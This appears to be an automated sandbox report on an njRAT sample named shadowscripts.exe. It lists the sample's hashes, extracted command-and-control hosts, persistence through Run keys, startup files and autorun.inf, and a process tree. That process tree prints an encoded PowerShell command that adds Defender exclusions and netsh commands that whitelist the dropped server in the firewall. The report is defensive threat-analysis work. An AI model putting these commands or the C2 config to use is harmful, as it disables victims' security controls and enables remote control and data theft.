Analysis
-
max time kernel
151s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
22-07-2023 19:02
Static task
static1
Behavioral task
behavioral1
Sample
shadowscripts.exe
Resource
win7-20230712-en
General
-
Target
shadowscripts.exe
-
Size
1.2MB
-
MD5
b0a79b29052cc5c816336f4b62284d9a
-
SHA1
fbc8b1d5abe62d281e80f469bfbc08f106ad0979
-
SHA256
12e490b358c0fa22c31181112cbef58b4636f287d586b5ffa412facd5fee3693
-
SHA512
a9aed2651024fa97164db592d835e4276e5465007c44a3cbafd305556f1b36fa966bcdf6e87cdd3d4373f9beaf32164a4dabd657a5523735511b23a55e65563a
-
SSDEEP
24576:8D7XBCahuVE5ocC6SC8fsXhugahBsCjz3XH8gohXdHI+1o7R:qlCa4emD6SVfmevjDH8dtHzqR
Malware Config
Extracted
njrat
0.7d
stupids
hakim32.ddns.net:2000
hands-social.at.ply.gg:46242
d4529f156f8f79f81b02518c9cf09857
-
reg_key
d4529f156f8f79f81b02518c9cf09857
-
splitter
|'|'|
Signatures
-
Disables Task Manager via registry modification
-
Modifies Windows Firewall 1 TTPs 3 IoCs
pid Process 3252 netsh.exe 3400 netsh.exe 3164 netsh.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation shadowscripts.exe Key value queried \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation Server2223.exe Key value queried \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation svhost.exe -
Drops startup file 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe server.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4529f156f8f79f81b02518c9cf09857Windows Update.exe server.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4529f156f8f79f81b02518c9cf09857Windows Update.exe server.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe server.exe -
Executes dropped EXE 5 IoCs
pid Process 2460 FreeScript.exe 2748 svhost.exe 2736 Server2223.exe 2464 server.exe 1748 svhost.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svhost = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svhost.exe" svhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svhost = "C:\\Users\\Admin\\AppData\\Roaming\\microsoft\\svhost.exe" svhost.exe -
Drops autorun.inf file 1 TTPs 4 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process File created C:\autorun.inf server.exe File opened for modification C:\autorun.inf server.exe File created F:\autorun.inf server.exe File opened for modification F:\autorun.inf server.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1880 powershell.exe 1880 powershell.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe 2464 server.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2464 server.exe -
Suspicious use of AdjustPrivilegeToken 32 IoCs
description pid Process Token: SeDebugPrivilege 1880 powershell.exe Token: SeDebugPrivilege 2464 server.exe Token: 33 2464 server.exe Token: SeIncBasePriorityPrivilege 2464 server.exe Token: 33 2464 server.exe Token: SeIncBasePriorityPrivilege 2464 server.exe Token: 33 2464 server.exe Token: SeIncBasePriorityPrivilege 2464 server.exe Token: 33 2464 server.exe Token: SeIncBasePriorityPrivilege 2464 server.exe Token: 33 2464 server.exe Token: SeIncBasePriorityPrivilege 2464 server.exe Token: 33 2464 server.exe Token: SeIncBasePriorityPrivilege 2464 server.exe Token: 33 2464 server.exe Token: SeIncBasePriorityPrivilege 2464 server.exe Token: 33 2464 server.exe Token: SeIncBasePriorityPrivilege 2464 server.exe Token: 33 2464 server.exe Token: SeIncBasePriorityPrivilege 2464 server.exe Token: 33 2464 server.exe Token: SeIncBasePriorityPrivilege 2464 server.exe Token: 33 2464 server.exe Token: SeIncBasePriorityPrivilege 2464 server.exe Token: 33 2464 server.exe Token: SeIncBasePriorityPrivilege 2464 server.exe Token: 33 2464 server.exe Token: SeIncBasePriorityPrivilege 2464 server.exe Token: 33 2464 server.exe Token: SeIncBasePriorityPrivilege 2464 server.exe Token: 33 2464 server.exe Token: SeIncBasePriorityPrivilege 2464 server.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2748 svhost.exe 1748 svhost.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2748 svhost.exe 1748 svhost.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 4636 wrote to memory of 1880 4636 shadowscripts.exe 89 PID 4636 wrote to memory of 1880 4636 shadowscripts.exe 89 PID 4636 wrote to memory of 1880 4636 shadowscripts.exe 89 PID 4636 wrote to memory of 2460 4636 shadowscripts.exe 92 PID 4636 wrote to memory of 2460 4636 shadowscripts.exe 92 PID 4636 wrote to memory of 2748 4636 shadowscripts.exe 93 PID 4636 wrote to memory of 2748 4636 shadowscripts.exe 93 PID 4636 wrote to memory of 2736 4636 shadowscripts.exe 94 PID 4636 wrote to memory of 2736 4636 shadowscripts.exe 94 PID 4636 wrote to memory of 2736 4636 shadowscripts.exe 94 PID 2736 wrote to memory of 2464 2736 Server2223.exe 95 PID 2736 wrote to memory of 2464 2736 Server2223.exe 95 PID 2736 wrote to memory of 2464 2736 Server2223.exe 95 PID 2748 wrote to memory of 1748 2748 svhost.exe 96 PID 2748 wrote to memory of 1748 2748 svhost.exe 96 PID 2464 wrote to memory of 3252 2464 server.exe 97 PID 2464 wrote to memory of 3252 2464 server.exe 97 PID 2464 wrote to memory of 3252 2464 server.exe 97 PID 2464 wrote to memory of 3400 2464 server.exe 99 PID 2464 wrote to memory of 3400 2464 server.exe 99 PID 2464 wrote to memory of 3400 2464 server.exe 99 PID 2464 wrote to memory of 3164 2464 server.exe 100 PID 2464 wrote to memory of 3164 2464 server.exe 100 PID 2464 wrote to memory of 3164 2464 server.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\shadowscripts.exe"C:\Users\Admin\AppData\Local\Temp\shadowscripts.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4636 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAZgBkACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAegBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAYwBrACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1880
-
-
C:\Users\Admin\AppData\Local\Temp\FreeScript.exe"C:\Users\Admin\AppData\Local\Temp\FreeScript.exe"2⤵
- Executes dropped EXE
PID:2460
-
-
C:\Users\Admin\AppData\Local\Temp\svhost.exe"C:\Users\Admin\AppData\Local\Temp\svhost.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Users\Admin\AppData\Roaming\microsoft\svhost.exe"C:\Users\Admin\AppData\Roaming\microsoft\svhost.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1748
-
-
-
C:\Users\Admin\AppData\Local\Temp\Server2223.exe"C:\Users\Admin\AppData\Local\Temp\Server2223.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Drops autorun.inf file
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2464 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:3252
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"4⤵
- Modifies Windows Firewall
PID:3400
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:3164
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1776
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
765B
MD578c3b7e51d2f3e17041516a5f9a5e58d
SHA1673979f1d2765fdd377244847e38e15e2bd77a63
SHA256b005bbd1b6293c6b6ae5ee122f0ccf6ff455168f539643412d07df64266f9f01
SHA512dbc1ec473bf034f6ec94c0fc9d8b84eb1562869249f8064dd8e8bc19626d5706b22e091f3264a04e307b59dfc76af73ec33053edc8ac6475e4c5c5dd3b331ebd
-
Filesize
913KB
MD5799c188cf6df366f4c0f98b8800a4977
SHA1161d6006518879ecba6cf45b29599992d8eadfce
SHA25632e96ac5e9d2f869ad11ca48401ca8eaeb520027751427145ddb5ab43bce1841
SHA51232a3749f4ef40e9345644c84666207a7c4f0369274cc18f71eecd1eeb6ea22733bc4cc6751f7281bbdff7e0a2187209a6c00653a95d6d39adb4dab06f355e1b1
-
Filesize
913KB
MD5799c188cf6df366f4c0f98b8800a4977
SHA1161d6006518879ecba6cf45b29599992d8eadfce
SHA25632e96ac5e9d2f869ad11ca48401ca8eaeb520027751427145ddb5ab43bce1841
SHA51232a3749f4ef40e9345644c84666207a7c4f0369274cc18f71eecd1eeb6ea22733bc4cc6751f7281bbdff7e0a2187209a6c00653a95d6d39adb4dab06f355e1b1
-
Filesize
913KB
MD5799c188cf6df366f4c0f98b8800a4977
SHA1161d6006518879ecba6cf45b29599992d8eadfce
SHA25632e96ac5e9d2f869ad11ca48401ca8eaeb520027751427145ddb5ab43bce1841
SHA51232a3749f4ef40e9345644c84666207a7c4f0369274cc18f71eecd1eeb6ea22733bc4cc6751f7281bbdff7e0a2187209a6c00653a95d6d39adb4dab06f355e1b1
-
Filesize
93KB
MD5cb7303205cfb306b5f41820e248a9a5a
SHA146f3e78cf65ee3e7ce29cd5e5be226659b7acb90
SHA2566107bff9958f6da87eb56fc2cdf9fd8a2cb916393beac50470926f43256d2130
SHA51287da0c05d48d5daca9132a0c361806b2f1f52d755cc08225a12aed551e9238c3a07b9f30c7953705b399bae57184441dd0287bd00971a29d9c9aa92b1fd7a77a
-
Filesize
93KB
MD5cb7303205cfb306b5f41820e248a9a5a
SHA146f3e78cf65ee3e7ce29cd5e5be226659b7acb90
SHA2566107bff9958f6da87eb56fc2cdf9fd8a2cb916393beac50470926f43256d2130
SHA51287da0c05d48d5daca9132a0c361806b2f1f52d755cc08225a12aed551e9238c3a07b9f30c7953705b399bae57184441dd0287bd00971a29d9c9aa92b1fd7a77a
-
Filesize
93KB
MD5cb7303205cfb306b5f41820e248a9a5a
SHA146f3e78cf65ee3e7ce29cd5e5be226659b7acb90
SHA2566107bff9958f6da87eb56fc2cdf9fd8a2cb916393beac50470926f43256d2130
SHA51287da0c05d48d5daca9132a0c361806b2f1f52d755cc08225a12aed551e9238c3a07b9f30c7953705b399bae57184441dd0287bd00971a29d9c9aa92b1fd7a77a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
44B
MD50371617c0582de75186bbd471f349171
SHA13573ac51c9f32cd1979def85242d3a90bdc9c871
SHA2569979119a3599ecc2dd4149131be8345469e09cba46726f203795d9563d3c0d4a
SHA512f83f66c907bb2a3f0fb3b3a535423e8aed122f1ba4c1a9aa65c84b9649a50ef6871b1b236913e16e3980372663fba969f514c19bd4b83a9a6d9e33bbcb520115
-
Filesize
93KB
MD5cb7303205cfb306b5f41820e248a9a5a
SHA146f3e78cf65ee3e7ce29cd5e5be226659b7acb90
SHA2566107bff9958f6da87eb56fc2cdf9fd8a2cb916393beac50470926f43256d2130
SHA51287da0c05d48d5daca9132a0c361806b2f1f52d755cc08225a12aed551e9238c3a07b9f30c7953705b399bae57184441dd0287bd00971a29d9c9aa92b1fd7a77a
-
Filesize
93KB
MD5cb7303205cfb306b5f41820e248a9a5a
SHA146f3e78cf65ee3e7ce29cd5e5be226659b7acb90
SHA2566107bff9958f6da87eb56fc2cdf9fd8a2cb916393beac50470926f43256d2130
SHA51287da0c05d48d5daca9132a0c361806b2f1f52d755cc08225a12aed551e9238c3a07b9f30c7953705b399bae57184441dd0287bd00971a29d9c9aa92b1fd7a77a
-
Filesize
183KB
MD59e74e4f56a6568d89660627d2ea95ec0
SHA141c0f2a94e9ee9d6a9fb4e61691f7db600b6305b
SHA2567eaf715a07a16038aabcf93c79a3d7ea27e30ac1ea421dd75eda8158867cb195
SHA512f6b54b2b84418caf3fe68791038ea9d64d2bcf4055319852f40175d17ab44f88cddc1634e830aa43aa0a4eca8cbe8d0047a64eb37277942f16a00c4c9daffe2c
-
Filesize
183KB
MD59e74e4f56a6568d89660627d2ea95ec0
SHA141c0f2a94e9ee9d6a9fb4e61691f7db600b6305b
SHA2567eaf715a07a16038aabcf93c79a3d7ea27e30ac1ea421dd75eda8158867cb195
SHA512f6b54b2b84418caf3fe68791038ea9d64d2bcf4055319852f40175d17ab44f88cddc1634e830aa43aa0a4eca8cbe8d0047a64eb37277942f16a00c4c9daffe2c
-
Filesize
183KB
MD59e74e4f56a6568d89660627d2ea95ec0
SHA141c0f2a94e9ee9d6a9fb4e61691f7db600b6305b
SHA2567eaf715a07a16038aabcf93c79a3d7ea27e30ac1ea421dd75eda8158867cb195
SHA512f6b54b2b84418caf3fe68791038ea9d64d2bcf4055319852f40175d17ab44f88cddc1634e830aa43aa0a4eca8cbe8d0047a64eb37277942f16a00c4c9daffe2c
-
Filesize
183KB
MD59e74e4f56a6568d89660627d2ea95ec0
SHA141c0f2a94e9ee9d6a9fb4e61691f7db600b6305b
SHA2567eaf715a07a16038aabcf93c79a3d7ea27e30ac1ea421dd75eda8158867cb195
SHA512f6b54b2b84418caf3fe68791038ea9d64d2bcf4055319852f40175d17ab44f88cddc1634e830aa43aa0a4eca8cbe8d0047a64eb37277942f16a00c4c9daffe2c
-
Filesize
5B
MD5d43c5b07c128b116b7bc8faf7b8efa9d
SHA1dd3540ad4ae14b21b665d108cf4570c2dfa6a6fa
SHA25680ad1cc7b3a784dad618a445af0c8cf3efa903f82a814756f2aaa7b57f45791f
SHA512618b01e2b808e1954d011635dfdf63bc75855145208fc5cae33ce09c7e5b43cf978f6511beb311765e6920e728a290c9f9ced7563e40e8ff8d093d50fdc18334
-
Filesize
183KB
MD59e74e4f56a6568d89660627d2ea95ec0
SHA141c0f2a94e9ee9d6a9fb4e61691f7db600b6305b
SHA2567eaf715a07a16038aabcf93c79a3d7ea27e30ac1ea421dd75eda8158867cb195
SHA512f6b54b2b84418caf3fe68791038ea9d64d2bcf4055319852f40175d17ab44f88cddc1634e830aa43aa0a4eca8cbe8d0047a64eb37277942f16a00c4c9daffe2c